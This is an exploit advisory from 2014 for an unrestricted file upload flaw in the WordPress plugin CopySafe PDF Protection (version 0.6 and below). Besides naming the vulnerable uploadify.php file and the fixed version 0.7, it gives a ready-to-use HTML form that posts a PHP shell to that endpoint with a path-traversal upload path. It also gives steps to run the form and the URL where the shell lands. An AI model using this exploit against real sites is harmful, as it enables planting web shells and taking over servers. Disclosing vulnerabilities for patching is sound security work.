##################################################################################################
#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload 
vulnerability
#Author        : Jagriti Sahu
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf
#version affected :  0.6 and below
#Date          : 14/07/2014
#Discovered at : IndiShell Lab
#Love to       : Surbhi, Mradula and Harry
##################################################################################################

////////////////////////
/// Overview:
////////////////////////
  Wordpress Plugin CopySafe PDF Protection(upto version 0.6) suffers 
from unrestricted file upload vulnerability which allow an attacker to 
upload malecious php shell on server.
to avaid exploitation , update plugin to version 0.7

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to lib/uploadify/uploadify.php file in which there 
is no check during file upload
attacker need to forward file upload request to this file with PHP 
shell and file upload path


///////////////////////
///  exploit code  ////
///////////////////////


<form 
action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php" 
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file" ><br>
<input type=text name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>

save this code on you machine as exploit.html
open exploit.html into webbrowser, brows your php shell and click 
submit button

shell will be uploaded in uploads directory
http://website.com/wp-content/uploads/shell.php